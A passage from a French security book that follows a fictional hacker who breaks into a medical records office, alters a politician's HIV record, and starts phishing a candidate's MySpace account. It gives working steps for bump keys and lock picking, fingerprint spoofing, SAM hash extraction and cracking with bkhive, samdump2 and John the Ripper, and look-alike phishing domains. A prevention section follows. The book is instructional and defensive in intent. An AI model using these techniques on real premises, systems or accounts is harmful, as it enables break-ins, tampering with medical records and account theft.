Emplacement physique de la salle des dossiers O se trouve la salle des dossiers ? Phnix a trouv le bureau des dossiers, mais o se trouvent les dossiers ? Rez-de-chausse ? Premier tage ? Derrire les toilettes ? Sil doit accder illgalement aux lieux, il doit passer le moins de temps possible chercher la salle des dossiers. Rpondeur automatique Sil appelle le bureau et est accueilli par un rpondeur automatique, il essaiera de passer par toutes les possibilits et de rcuprer autant de noms, dpartements et numros de poste que possible. Avec ce type dinformations, il peut commencer se faire passer pour un autre au tlphone. Informations rcupres par Phnix Voici une liste des informations rcupres par Phnix grce lingnierie sociale, au piggybacking et la reconnaissance .
m

Noms : Marie, rceptionniste ; Tho, dossiers ; Ben, dossiers ; Marc, informatique ; Julie, ressources humaines. Emplacement des bureaux et numros de tlphone : Sige : 11e avenue Succursale, rue des Ormes Succursale, rue des rables Succursale, Grand-Rue Bureau des dossiers, 123 Grand-Rue Bureaux administratifs, avenue de la Fort 01 11 11 11 11 ; 01 66 66 66 66 ; 01 77 77 77 77 ; 01 88 88 88 88 ; 01 99 99 99 99 ; 01 00 00 00 00 ;

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

207

Horaires douverture : Bureau des dossiers, 8 h 18 h ; Sige et succursales : 24/24, 7/7 ; Bureaux administratifs : 8 h 17 h.

Prsence sur Internet : Ladresse du site web est www.centremedicalregional.org. Le courrier lectronique est la mme adresse que le site web. Trois serveurs DNS sont utiliss.

Fournisseurs externes : Wendis Marketing : prestataire commercial ; Expensive Software : entreprise qui fournit le logiciel de gestion des dossiers mdicaux ; LocalPhone SARL : fournisseur de services tlphoniques ; Dchiquetage Scuris : sous-traitant pour le dchiquetage du papier ; Radiologie SA : soccupe de lexamen des radios.

Prestataire commercial : Wendis Marketing, Inc. 987 Locust Street Houston, TX tats-Unis +1 713-555-9875

Sites web Wendis Marketing : www.wendimarketing.com ; Services tlphoniques : www.localphone-sarl.com ; Fournisseur du logiciel : www.expensiveemrsoftware.com ; Dchiquetage : www.dechiquetagesecurise.com ; Radiologie : www.radiologie-sa.com.

208

Chanes dexploits

Personnel informatique : Marc, employ de lentreprise. Il est le seul employ du service informatique.

Types de logiciel et systme dexploitation, identiants et mots de passe : Station de travail : Microsoft Windows XP ; Serveur : Microsoft Windows 2000 ou 2003 ; Gestion des dossiers : SOAPware. Nom dutilisateur : 198764 ; mot de passe : password.

Adresses de courrier lectronique ou format : prnom suivi du nom de domaine. Exemple : marc@centremedicalregional.org. Cette information peut tre trouve dans une poubelle.

Points dentre : Le bureau des dossiers a trois points dentre : la porte dentre, en verre, une porte de service utilise par les employs pour entrer et aller fumer, et une zone de chargement.

Scurit physique : pas dalarme, seulement des serrures sur les portes du primtre ; serrure standard 480 pne dormant sur les portes extrieures (voir Figure 6.1) ; pas de gardiens.

Figure 6.1
Serrure standard 480 pne dormant.

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

209

Salle des dossiers : En entrant par la porte de service, traverser le hall, deuxime droite, troisime porte gauche.

Rpondeur automatique : Oui, mais il ne sert qu rcuprer les appels de nuit et les appels manqus par Marie.

Types de procdure mdicale : mdecine gnrale ; la radiologie est sous-traite Radiologie SA.

Planning de congs : La-t-il trouv pendant la reconnaissance ?

Organigramme : Il la trouv dans une poubelle.

Phnix a maintenant de nombreuses informations et peut commencer rchir son plan : 1. obtenir un accs physique ; 2. trouver un PC et le pirater ; 3. lancer le logiciel de gestion des dossiers ; 4. modier le dossier informatique ; 5. rcuprer ou modier la copie papier du dossier ; 6. sortir sans laisser de trace. Obtenir un accs physique Phnix doit-il essayer dentrer de jour ou de nuit ? Chacune de ces possibilits pose ses propres ds. En journe, les serrures ne sont pas un obstacle, mais les employs peuvent lui poser problme. De nuit, il aura grer quelques serrures. Selon son valuation, Phnix pense que la nuit est une meilleure option an dviter toute confrontation avec des employs.

210

Chanes dexploits

Crochetage de serrures Pour obtenir un accs physique, Phnix doit forcer deux serrures. Il a deux mthodes pour cela : enfoncer les portes ou crocheter les serrures. Les deux mthodes sont efcaces, mais de manire diffrente. Si Phnix na pas vraiment besoin de cacher ses traces, la premire mthode est sufsante. Sinon, il devra crocheter les serrures. Selon son entranement, cela peut lui prendre de 5 45 minutes.

Cest une des nombreuses techniques que Phnix doit matriser avant de crocheter une serrure relle. Il existe trois faons de procder :
m m m

utiliser un kit de crochetage et apprendre crocheter une serrure ; utiliser un pistolet de crochetage (pick gun) ; utiliser une cl de frappe (bump key).

Phnix va utiliser une cl de frappe car il sait que cela laisse moins de traces sur la gorge de la serrure quun pistolet de crochetage et que cest une technique trs efcace. Une cl de frappe est parfois appele "cl 999" car toutes les dcoupes sont la profondeur maximale de 9. Les cls de frappe sont efcaces et simples fabriquer. Notez que, la Figure 6.2, toutes les cls ont la mme dcoupe. Toutes les dcoupes sont la profondeur maximale de 9. Vous pouvez crer des cls de frappe pour les serrures goupilles classiques comme pour les serrures radiales, avec ou sans micropoints. Phnix peut crer ses propres cls de frappe avec une lime et un peu de patience. Il prend une vieille cl et lime les dcoupes jusqu la profondeur maximale des dcoupes existantes. Le principe dune cl de frappe est de linsrer aussi loin que possible et de la sortir dun seul cran. Phnix entendra un clic lorsque la dernire goupille senclenchera. Puis il tournera la cl comme pour ouvrir la serrure pour augmenter la pression sur les goupilles. Avec une poigne de marteau ou nimporte quel objet solide sans tre trop lourd, il tape sur la cl en gardant la pression sur la cl. En appliquant la bonne pression et la bonne puissance de choc, la serrure souvre. Si la serrure ne tourne pas, cela signie que Phnix a trop appuy ou tap trop faiblement ou trop fort. Lutilisation dune cl de frappe est trs efcace dans les mains dune personne exprimente. Si Phnix narrive pas utiliser sa cl de frappe, il peut utiliser un pistolet de crochetage. Un pistolet de crochetage (voir Figure 6.3) est constitu de pices de mtal vibrantes en forme de crochets. Un pistolet de crochetage "racle" automatiquement.

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

211

Dcoupe

Dcoupe

Dcoupe

Figure 6.2
Dcoupes de cls.

Sil utilise un pistolet de crochetage, Phnix aura besoin de plusieurs crochets et dun tendeur. Il introduit le tendeur et un crochet, et appuie sur la dtente. Cette mthode peut tre assez efcace.

Figure 6.3
Pistolet de crochetage classique.

212

Chanes dexploits

Si le pistolet de crochetage ne fonctionne pas, Phnix peut avoir utiliser un kit de crochetage et crocheter la serrure. La plupart des serrures pne dormant utilisent des serrures cylindriques. Ce type de serrure est plus sr quun loquet ressort car il est plus difcile de pousser le verrou partir du ct de la porte. La Figure 6.4 illustre un exemple de serrures cylindriques.

Figure 6.4
Serrures cylindriques.

Il faut deux types doutils pour crocheter une serrure : des crochets et des tendeurs. Les crochets sont longs et ns, similaires aux outils dun dentiste. Un tendeur est comparable un tournevis ; de fait, un tournevis est un bon tendeur. Une mthode courante de crochetage est le raclage. Le raclage est moins exact que le crochetage et est une technique utilise par les novices. Lorsquon racle une serrure, on insre un crochet avec un bout large tout le long de la serrure. Puis on tire ou on racle rapidement en accrochant toutes les goupilles, tout en appliquant de la tension avec le tendeur, tension identique celle que lon applique avec une cl de frappe. Les goupilles attrapent la ligne de cisaillement. La ligne de cisaillement est lendroit o le cylindre intrieur et le cylindre extrieur se rejoignent. Si Phnix doit crocheter la serrure, il nutilisera pas cette technique car elle peut laisser des marques sur les goupilles et laisser des traces de son intrusion. La Figure 6.5 illustre lintrieur dune serrure.

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

213

Figure 6.5
Intrieur dune serrure.

Vaincre la biomtrie Aprs avoir accd au btiment, Phnix doit accder la salle des dossiers. La salle des dossiers est verrouille avec une serrure biomtrique.

Vaincre la biomtrie peut prendre deux nuits. Sil doit crer une fausse empreinte, Phnix naura peut-tre pas les outils ncessaires, tels quun ordinateur et une imprimante, avec lui. La Figure 6.6 illustre une serrure empreintes digitales.

Figure 6.6
Serrure empreintes digitales LA9-3 par ADEL.

214

Chanes dexploits

Il existe trois mthodes pour tromper un scanner biomtrique :


m m m

ractiver lempreinte prcdente sur le scanner lui-mme ; utiliser des empreintes laisses sur une bouteille ou une vitre ; crer un faux doigt.

La premire mthode est la plus simple. Certains scanners dempreintes ractivent lempreinte prcdente lorsquon soufe dessus. Vous avez bien lu. Phnix sapproche du scanner et soufe lentement et profondment dessus. Lorsquil soufe, le capteur dtecte la chaleur et lhumidit de son soufe et voit lempreinte laisse par la personne prcdente. Cette mthode est rapide et ne demande aucune comptence. Si elle choue, Phnix devra passer la deuxime mthode. La deuxime mthode peut fonctionner trs bien parce que de nombreux scanners sur le march scannent en deux dimensions et non en trois dimensions. Par consquent, limage dun doigt fonctionne presque aussi bien que le doigt lui-mme. Pour cela, Phnix a besoin de quelques fournitures. Un kit de rcupration dempreintes, disponible pour une trentaine deuros, est la faon la plus simple de mettre en uvre cette mthode. On peut aussi utiliser un kit fait maison, comme vous pouvez le voir sur certains blogs :
m m

de la Super Glu ; une petite capsule de bouteille.

Phnix a aussi besoin des lments suivants :


m m m m m m m m

un appareil photo avec le cble de transfert ; de la colle bois ; une paille en plastique ; une colle autre que de la Super Glu (cest--dire une colle utilisable sur les doigts) ; des feuilles dactate ; une imprimante laser ou jet dencre de qualit ; un ordinateur portable ; un logiciel de retouche photo, comme Microsoft Paint.

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

215

Il doit trouver une tasse, un verre ou un objet non poreux laiss par une personne autorise entrer dans la pice. Il regarde dans la cuisine, la poubelle ou sur le bureau de la personne. Au pire, il peut essayer de rcuprer lempreinte sur la serrure elle-mme. Une fois en possession de lobjet, Phnix doit en extraire lempreinte. Sil dispose dun kit de prise dempreintes, lopration est trs rapide. Sinon, il devra faire gicler un peu de Super Glue dans la capsule et la placer sur lempreinte. Lorsque les vapeurs de la colle fumigent lempreinte, celle-ci devient gris-blanc. Une fois lempreinte apparente, Phnix doit en prendre une photo de trs prs. Il transfre ensuite la photo dans son ordinateur. Il nettoie limage avec son logiciel de retouche photo et limprime sur la feuille dactate. Avec la paille, il disperse de la colle bois sur lempreinte : cela constitue la nouvelle empreinte. Lorsque la colle est sche, Phnix dcoupe lempreinte et sassure quelle fait la mme taille que celle quil a rcupre sur le verre. Aprs lavoir dcoupe, il la colle sur son doigt avec la colle prvue cet effet. Malheureusement, certains lecteurs dempreintes ne fonctionnent pas avec ce type dempreinte. Si cest le cas, Phnix devra utiliser la troisime mthode, plus gourmande en temps, et devra probablement rpartir son attaque sur deux visites. Pour crer un faux doigt, aprs avoir rcupr lempreinte, lavoir photographie et imprime comme dcrit prcdemment, il doit se procurer de la pte polymre. Il transfre lempreinte sur la pte. Avec une petite perceuse, il dcoupe ou cisle les crtes et valles dans le matriau de moulage. Les scanners biomtriques nont besoin que dun petit nombre de minuties. Les ns de crte et les bifurcations sont nommes minuties. Lorsque Phnix a cr une empreinte tridimensionnelle, il peut entrer dans la salle des dossiers. Accder Windows via Backtrack Maintenant que Phnix est entr, il peut se concentrer sur ce quil fait le mieux. Compromettre un PC et modier les dossiers mdicaux sont des tches faciles pour lui. Pour accder au logiciel de gestion des dossiers, il a besoin dun nom dutilisateur et dun mot de passe pour se connecter au systme : il doit craquer le mot de passe. Phnix a dj tlcharg et grav un CD amorable Linux. Il a choisi Backtrack, dont lISO est disponible sur remote-exploit.org.

216

Chanes dexploits

Il sagit dune ISO base sur Kubuntu (www.kubuntu.org), qui est un systme dexploitation Linux qui fonctionne en mmoire vive et sur un CD. Ce CD contient de nombreux outils daudit de scurit. Phnix sintresse bkhive, samdump2 et John the Ripper. Avec ces trois outils, il a de bonnes chances daccder au mot de passe de ladministrateur local. Le CD contient galement divers chiers compresss de mots de passe courants. Phnix dmarre Backtrack et rcupre les hashes des mots de passe. Pour cela, il place le CD de Backtrack dans le lecteur du PC cible et allume ce dernier. Une fois le CD amorc, il ouvre un terminal. Pour cela, il suft de cliquer sur la petite icne de terminal en bas gauche. Lorsque le terminal est ouvert, Phnix tape la commande suivante, qui permet daccder au disque local depuis Linux :
mount /dev/hda1

La commande suivante permet daccder au rpertoire de travail du CD Backtrack :


cd /pentest/

Phnix utilise dabord bkhive, puis samdump2, de Ncuomo, et pour nir John the Ripper. La commande suivante lui donne le syskey, cest--dire le hash chiffr du mot de passe :
bkhive-linux /mnt/hda1/WINDOWS/system32/config/system syskey.txt

Phnix lutilise avec le chier SAM :


samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam syskey.txt>hash.txt

Pour tenter de craquer le mot de passe, le plus simple, pour Phnix, est de passer par un dictionnaire de mots. Il a toujours de tels chiers sur une cl USB quil garde en permanence sur lui. Il la branche sur lordinateur et saisit les commandes suivantes :
mkdir /mnt/sdb1 mount /dev/sdb1 /mnt/sdb1 gunzip -c /mnt/sdb1/wordlists/english/english.txt.gz > /pentest/englishtxt.txt

Phnix dispose maintenant de lempreinte et dune liste de mots dcompresse, il peut donc tenter de le craquer avec la commande suivante :
john hash.txt -w:englishtxt.txt Loaded 4 password hashes with no different salts (NT LM DES [32/32 BS] D (Administrator:2) PASSWOR(Administrator:1) Guesses: 2 time 0:00:00:02 100% c/s 2971272 trying: ZZYZX - ZZZZZZZ

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

217

Le mot de passe est entirement en majuscules : cest une anomalie de John the Ripper. Phnix ne peut pas supposer que cest effectivement le cas. Il devra essayer de taper les lettres en majuscules et en minuscules. John the Ripper a aussi indiqu que le mot de passe appartenait au compte administrateur, Phnix est donc trs heureux de ses progrs. John the Ripper permet galement les attaques par force brute, mais elles sont plus longues :
john hash.txt -i:all

Phnix voit que John a fait deux essais. Au premier essai, il a trouv passwor. Au second, il a trouv d. Le mot de passe du compte administrateur est password. Phnix dispose donc du compte de ladministrateur local. Sil ntait arriv rien, il aurait pu copier le chier de hashes sur un mdia externe, comme un disque dur externe, et le soumettre RainbowCrack (http://project-rainbowcrack.com/). Modier des informations mdicales Phnix peut maintenant dmarrer le PC sous Windows grce au compte administrateur et son mot de passe. Il peut redmarrer lordinateur en retirant le CD de Backtrack. Lorsque lordinateur lui demande de se connecter, il saisit le nom dutilisateur Administrator et le mot de passe password. Il se connecte ensuite au systme de gestion des dossiers, dont il a rcupr laccs pendant sa phase dingnierie sociale, avec lidentiant de Ben ( 198764) et son mot de passe (password). Lorsquil lance le logiciel, il dispose de tous les dossiers porte de clavier. Le contrat pass entre Didier et le politicien tait de modier le diagnostic de VIH ou de supprimer le dossier (selon ce qui est le plus simple faire) et de nen parler personne, le tout pour une certaine somme. Et cest ce pourquoi Didier a embauch Phnix. Phnix saisit le code CIM-9 079-53 (correspondant au VIH2), le supprime du dossier, et supprime toute rfrence au VIH. Il accde ensuite au dossier physique et supprime ou efface toute trace du VIH. Phnix imprime ensuite une copie du dossier pour que Didier puisse le montrer au politicien. Phnix est entr dans un monde dune lgalit douteuse. Il a commis un crime, voire plusieurs. Cette altration de dossiers mdicaux pourrait lui valoir un procs et de la prison, sil tait condamn. De plus, mme si ces mthodes pourraient fonctionner pour

218

Chanes dexploits

percer des scurits et des systmes, lauteur ne recommande pas ces techniques. Ce scnario a t cr titre dexemple pour les techniques et possibilits de lingnierie sociale et lintrusion dans une entreprise de nimporte quelle taille. Rsum de la chane dexploits Phnix a enchan les exploits suivants : 1. ingnierie sociale ; 2. accs physique au btiment et la salle des dossiers ; 3. compromission dun PC en le dmarrant sous Linux et en craquant le mot de passe ; 4. modication des donnes personnelles.

Mesures de prvention
Cette section traite des diverses mesures de prvention que vous pouvez dployer contre cette chane dexploits. Mesures contre lingnierie sociale et le piggybacking Votre organisation doit disposer de politiques et procdures crites de scurit et la hirarchie doit y croire. Sans ces documents, vous navez pas vraiment de scurit. Une bonne scurit est difcile mettre en place. Trop de scurit devient vite pnible et mme les plus honntes trouveront des moyens de contourner le systme. Trop peu de scurit ne sert rien. Une scurit efcace est celle qui est un bon compromis entre le confort et la scurit. Reprenons ce chapitre tape par tape. Lingnierie sociale est probablement llment de vulnrabilit contre lequel il est le plus difcile de se protger. Si vous tes soucieux de scurit, vous devez imprativement vous intresser aux attaques par ingnierie sociale. Comme la dit Kevin Mitnick, "vous pouvez dpenser des fortunes en technologies et services pour protger votre rseau et votre infrastructure rseau peut rester vulnrable de la bonne vieille manipulation". duquer votre personnel est un strict minimum. Certaines dispositions lgales comme, aux tats-Unis, le Gramm-Leach-Bliley Act ou lHIPAA, recommandent une formation annuelle la scurit.

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

219

Voici quelques sujets couvrir :


m

Les attaques en ligne. Il existe de nombreuses attaques en ligne : elles sont trs populaires, peu coteuses et faciles mettre en uvre. Il suft denvoyer un courrier lectronique et de voir ce quil se passe. Voici certaines attaques contre lesquelles vous pouvez duquer votre personnel : Attaques par hameonnage. Un courrier lectronique ou site web malveillant cherchant obtenir des informations personnelles ou nancires est une attaque par hameonnage. Mez-vous des courriers non sollicits vous demandant de divulguer des informations personnelles. Vous vous souvenez peut-tre du clbre message semblant venir dune banque, qui a demand aux destinataires daller sur un site web et dy saisir leur numro de scurit sociale et des informations personnelles comme conrmation de leurs dossiers, ce qui a permis aux attaquants de rcuprer des informations personnelles pour leur propre usage. Attaques par courrier lectronique. Tout courrier lectronique muni dune pice jointe doit tre considr comme suspect. Si vous recevez un message, sollicit ou non, avec une pice jointe, appelez lexpditeur et vriez. Tlchargement de logiciels. Les logiciels ne devraient tre tlchargs que par le service informatique, sur une machine isole qui soccupe de les passer lantivirus. Le service informatique doit galement vrier lempreinte du chier grce un gnrateur dempreintes MD5, comme Chaos MD5, tlchargeable gratuitement ladresse http://www.elgorithms.com/. Aprs vrication, le logiciel peut tre install sur les PC des utilisateurs. Logiciels espion (spyware). Les logiciels espion sont lgaux. En fait, la plupart des fournisseurs de logiciels espion noncent que, en installant le logiciel, vous acceptez le CLUF (Contrat de Licence Utilisateur Final, ou EULA, End User License Agreement), et ledit CLUF nonce quil installera un logiciel supplmentaire : vous acceptez cela en acceptant la licence. Vous devez avoir des logiciels anti-espion (antispyware) installs sur toutes les machines. Sites web. Des sites web illicites peuvent avoir des liens douteux. Si vous cliquez dessus, ils peuvent installer des logiciels sur votre PC. Vous devez installer des logiciels de ltrage de contenu ou un quipement de ltrage web pour combattre cela. Messagerie instantane. La messagerie instantane peut poser beaucoup de problmes, car elle contourne les pare-feu et le ltrage web. Nautorisez pas la messagerie instantane dans votre entreprise ou restreignez-la un usage interne.

220

Chanes dexploits

Le tlphone. Le tlphone est un grand classique des attaques par ingnierie sociale. Les gens sont plus tmraires sils nont pas vous regarder dans les yeux. Cela permet des attaquants dtre plus persuasifs quils ne le seraient face face avec leurs victimes. Assistance technique. Lassistance technique peut recevoir des appels leur demandant des mots de passe ou de rinitialiser des mots de passe, ainsi que dautres informations condentielles. duquez votre personnel pour quils ne donnent pas ces informations. Si lassistance technique doit pouvoir donner ou accder des informations personnelles ou condentielles, rendez obligatoire un rappel et une vrication supplmentaire. Rceptionniste. Les rceptionnistes sont gnralement en premire ligne de lappel et de lattaque. Ils doivent tre entrans dtecter une attaque par ingnierie sociale et connatre la marche suivre pour remonter ce type daction. En cas de soupon dattaque par ingnierie sociale, celle-ci doit tre immdiatement signale.

Les poubelles. Cest un travail peu ragotant, mais un pirate le fera. Des tonnes dinformations peuvent tre obtenues en fouillant les poubelles de quelquun dautre. Poubelles extrieures. Il est conseill de placer des panneaux Proprit prive, de verrouiller les poubelles et de tout passer la dchiqueteuse. En cas de doute, dchiquetez vos documents. Vous pouvez aussi passer par un prestataire extrieur qui soccupe de dchiqueter vos documents, mdias externes, journaux, livres et autres. Poubelles internes. Il est important de sassurer que les poubelles sont vides rgulirement. Les canettes et les bouteilles peuvent servir rcuprer des empreintes digitales. Vous devez galement vrier les antcdents de votre personnel de nettoyage. Les fuites dinformations provenant du personnel de nettoyage peu scrupuleux ne sont pas rares.

Piggybacking. Le piggybacking est une autre forme dingnierie sociale. Un attaquant peut entrer juste derrire quelquun dautre lorsquil na pas de cl ou de code pour entrer. La seule manire dviter cela est de former, former et reformer vos employs. Comme pour lingnierie sociale, le piggybacking est vitable si les gens sont correctement forms. On peut aussi considrer certains lments physiques comme lemploi de gardiens ou de sas de sparation. Il sagit dun ensemble de portes doubles qui crent un effet sandwich et une seule personne peut passer la fois. Ce mcanisme ntait autrefois utilis que pour des bijouteries haut de gamme et pour les banques, mais il est de plus en plus frquent dans certains sites gouvernementaux et certaines entreprises.

Chapitre 6

Obtenir un accs physique des dossiers mdicaux

221

Mesures contre le crochetage Les gens crochtent des serrures depuis des sicles et continueront dans les sicles venir. Vous pouvez empcher cela en ajoutant des contrles. Ne vous contentez pas de mettre des serrures, mettez en place des serrures scurises (rsistant aux cls de frappe), des camras de scurit et un systme dalarme. Si quelquun veut entrer et si sa motivation est sufsante, il entrera de toute faon, mais votre travail est de vous assurer que cela sera le plus difcile possible. Mesures contre lchec de la biomtrie Tant quil y aura de nouvelles technologies, quelquun samusera les vaincre. Pour prvenir lchec de votre installation biomtrique, vous devez installer plusieurs niveaux de dfense et de contrle pour compenser cela : une authentication deux ou plusieurs facteurs, comme "ce que vous savez" (un mot de passe), "ce que vous tes" (une identication biomtrique) et "ce que vous avez" (une cl). Deux ou trois de ces lments rendront votre systme biomtrique bien plus difcile vaincre. Mesures contre la compromission dun PC Vous pouvez empcher la compromission de votre PC. Vous devez commencer par la scurit physique. De plus, vous ne devez pas autoriser lutilisation de mdias externes (CD-ROM, cl USB, disque externe ou autre) Dans lattaque qui prcde, lattaquant a utilis plusieurs programmes pour connatre le mot de passe de tous les comptes de lordinateur en question. Pour cela, le pirate a rcupr le hash du mot de passe. Une fois ce hash rcupr, ce nest quune question de temps avant que le mot de passe ne soit trouv. Ce temps peut tre largement augment par lutilisation de mots de passe forts. Les mots de passe doivent comprendre au moins 9 caractres et contenir des minuscules, des majuscules et des caractres spciaux. Dans une zone haute scurit, les mots de passe devraient faire plus de 15 caractres. Cela protge le hash contre Rainbow Crack. Voici quelques suggestions pour rendre la compromission dun PC plus difcile :
m m m

dsactiver le compte administrateur ; vrier quil ny a pas de comptes locaux actifs sur le PC ; dsactiver le cache didentiants de connexion sur le domaine ;

222

Chanes dexploits

mettre en uvre une stratgie de correctifs. Tous les systmes dexploitation doivent tre mis jour rgulirement : leurs programmeurs sont humains, et les humains font des erreurs. Appliquez les correctifs de votre systme pour vous assurer de corriger toutes les vulnrabilits. http://cve.mitre.org est un rpertoire des vulnrabilits connues. mettre en uvre des procdures daudit ; utiliser une mthodologie de moindre privilge pour viter les accs superus ; utiliser une authentication unique comme RSA Secure-ID ou SafeWord de Secure Computing.

m m m

Les modications du logiciel de gestion des dossiers semblent videntes :


m m m m m m

disposer de stratgies appropries lorsquun employ quitte son poste ; avoir des contrles appropris pour changer ou verrouiller un compte ; appliquer la condentialit des mots de passe et lauthentication deux facteurs ; mettre en uvre des procdures daudit ; utiliser une mthodologie de moindre privilge pour viter les accs superus ; utiliser RSA Secure-ID (comme vu prcdemment).

Conclusion
Aprs avoir obtenu les chiers de donnes ncessaires pour altrer le dossier mdical du politicien, il a continu travailler avec lui, car dautres dossiers mdicaux et dossiers dassurance maladie ncessitaient des modications. Didier a obtenu une somme dargent non ngligeable en tant quintermdiaire et a obtenu un emploi dans un autre centre radiologique local. Le centre mdical rgional ne sait pas que ses systmes ont t percs et na aucune ide de lamplitude de la faille. Lhomme politique a continu sa carrire conservatrice et a subi un traitement mdical agressif dans une clinique prive ltranger. La compromission de dossiers mdicaux, des ns de fraude lassurance, de vol didentit mdicale et des ns purement pcuniaires, a lieu toutes les heures. Avec les avances rcentes en ce qui concerne les dossiers mdicaux en ligne et les ordonnances par courrier lectronique, de nouveaux exploits en chane souvrent au monde des pirates.

7
Attaquer des rseaux sociaux
Scnario
Billant et stirant, Phnix se lve un mercredi aux alentours de midi. Il se dirige vers son ordinateur pour prendre connaissance des dernires nouvelles et est instantanment rveill en entendant la nouvelle : Wally Barkinotza a dcid de se prsenter au Snat. Phnix se souvient bien de Wally Barkinotza : cest le voisin agaant qui lavait dnonc lorsquil stait chapp de la maison, enfant. Phnix na jamais oubli lexpression de ses parents lorsquil tait revenu la maison et les avait trouvs, lattendant, dans le salon, avec Wally. Phnix noubliera jamais non plus la punition quil a reue cause de a. Il dcide de regarder ce que Wally fait et commence chercher plus dinformations sur sa course au Snat. Il dcouvre que Wally, comme de nombreux politiciens, a un compte sur MySpace, un rseau social populaire, destination de ses partisans. Phnix parcourt le site et lit les prises de position de Wally. Il ouvre le dernier billet de blog de Wally et lit le travail quil a effectu sur la rforme de lducation et celle du systme de sant. "Sans intrt", pense Phnix. Il lit lavis de Wally sur le libre-change et le contrle des armes feu. Phnix bille et se demande ce qui pourrait distinguer Wally des autres candidats. Cest alors quil trouve ce quil cherchait. Wally Barkinotza promet que, sil est lu, il travaillera la scurit dInternet et proposera une loi permettant au gouvernement de surveiller toute activit sur Internet sans mandat de perquisition. Wally Barkinotza veut rendre obligatoires des politiques dutilisation acceptable chez tous les fournisseurs daccs Internet an que les activits criminelles ou suspectes criminelles puissent tre surveilles. Au vu de ses activits, la dernire chose que veut Phnix est quune loi fdrale permette de lespionner. Par ailleurs, pense-t-il, le

224

Chanes dexploits

Quatrime amendement de la Dclaration des droits protge contre les perquisitions draisonnables, ce qui, dans lesprit de Phnix, sapplique galement ses activits sur Internet. Phnix commence rchir la manire dont il peut empcher Wally Barkinotza dtre lu au Snat.

Approche
Le but de Phnix est ici de sexprimer sur une cause politique (on appelle parfois cela de lhacktivism). La meilleure manire dviter llection de Wally Barkinotza est dentacher sa rputation au point que la probabilit quil soit lu tombe zro. Comme le candidat a dj une image publique sur MySpace, Phnix na qu pirater le compte et envoyer de la propagande partir du compte de Wally pour que celui-ci soit dtest par le public. MySpace est un rseau social populaire qui compte plus de 100 millions de comptes. Aprs vous tre enregistr pour un compte gratuit, vous pouvez publier des images, de la musique, des notes de blog et bien plus encore. Avec plus de 200 000 nouveaux comptes par jour, il est probable que vous soyez sur MySpace ou que vous connaissiez quelquun qui y est inscrit. La popularit a son ct face, cependant : elle fait de MySpace une cible dattaque privilgie. Chaque jour, des gens piratent des comptes MySpace et volent lidentit sociale dautres. Aujourdhui ne fait pas exception : Phnix va essayer de pirater la page MySpace de Wally Barkinotza. Phnix va crer un compte sur MySpace et publier un commentaire sur la page MySpace de Wally. Le commentaire inclura un lien semblant pointer vers le site de partage de vidos YouTube. En ralit, lorsque Wally cliquera sur la vido, ce lien le redirigera vers une fausse instance de MySpace mise en place par Phnix et indiquant Wally quil doit tre identi pour accder la vido. Wally, pensant quil a t dconnect accidentellement, ne se posera pas de question et saisira ses identiants MySpace sur le site web de Phnix. Phnix rcuprera le nom dutilisateur et le mot de passe ncessaires pour se connecter au MySpace de Wally. Une fois connect, Phnix crera un billet de blog contenant un message politique visant offenser le public et lenverra tous les amis de Wally. Lorsque son image publique sera dtruite, Wally naura plus aucune chance de devenir snateur.

Chapitre 7

Attaquer des rseaux sociaux

225

Lattaque se droulera en plusieurs tapes : 1. crer un faux site web MySpace pour capturer les informations de connexion de Wally ; 2. mettre en place un site web pour rediriger les utilisateurs vers le faux site MySpace pour djouer les mcanismes antihameonnage ; 3. crer une page MySpace lgitime ne pouvant tre lie Phnix et crer des amis pour paratre sympathique Wally ; 4. utiliser cette identit MySpace pour publier un commentaire sur la page MySpace de Wally an quil clique sur le lien du commentaire, ce qui le redirigera sur la page de connexion du faux site web MySpace ; 5. attendre que Wally se connecte au faux site web MySpace avec ses identiants rels que Phnix pourra capturer ; 6. utiliser les identiants MySpace de Wally pour se connecter MySpace et publier un message politique visant offenser le public ; 7. regarder les informations pour observer sa dchance politique.

Chane dexploits
Cette section dtaille la chane dexploits de Phnix :
m m m m m m m

crer un faux site web MySpace ; crer un site web de redirection ; crer une page MySpace ; envoyer un commentaire ; compromettre le compte ; se connecter au compte pirat ; rsultats.

Cette section se termine par un rsum de la chane dexploits.

226

Chanes dexploits

Crer un faux site MySpace La premire tape est de crer un site web qui ressemble MySpace. Phnix doit sassurer que le domaine ne peut pas lui tre associ. Il publie une annonce sur Craigslist, une communaut en ligne de forums et dannonces, avec une adresse de courrier lectronique anonyme. Lannonce de Phnix est la suivante :
"Professeur duniversit sans comptences techniques cherche aide pour site web. Paiement en liquide pour un enregistrement de site web."

Plus tard dans la journe, quelquun lui rpond et lui propose son aide. Phnix le rencontre et lui donne 20 dollars en liquide. Phnix fait lidiot et explique quil veut crer un site comme MySpace mais quil ne sait pas comment lenregistrer. 24 heures plus tard, un nouveau site nomm ghtwzlmbqbpt.biz est enregistr au nom dun inconnu que Phnix a rencontr sur Craigslist. Si quelquun veut tracer lattaque, il ne pourra pas remonter Phnix. Phnix sassure que lenregistrement est priv. Un enregistrement priv cote gnralement un peu plus cher, mais masque la personne qui a enregistr le site dans les enregistrements WHOIS. On nest jamais trop prudent. Vous pouvez vous demander pourquoi Phnix a choisi le nom ghtwzlmbqbpt.biz. Il voulait un nom de site qui soit du charabia pour lutilisateur moyen. Il cre ensuite le sous-domaine www.myspace.com.ghtwzlmbqbpt.biz pour le site web. Lutilisateur moyen lira myspace.com et ne remarquera probablement pas quil ne sagit pas de MySpace.
Domaines alternatifs Idalement, Phnix devrait utiliser un domaine plus proche de myspace.com, comme mmyspace.com ou myspacee.com, mais, vu le nombre dattaques sur MySpace ces derniers temps, ces domaines sont probablement dj pris et auraient pu sembler louches la personne qui la aid pour crer le nom de domaine.

Phnix copie ensuite la page daccueil de MySpace et ses images avec un gestionnaire de tlchargement comme wget. Nous traitons plus en dtail de wget au Chapitre 2 "Espionnez votre chef". Phnix modie lgrement le code. Il ajoute dabord la phrase "Merci de te connecter avant de continuer" au-dessus du formulaire de connexion. Il se souvient avoir vu cette phrase en naviguant sur MySpace sans se connecter. Cette tape est ncessaire car, lorsque Wally cliquera pour afcher la vido YouTube, Phnix veut quil aille sur cette page

Chapitre 7

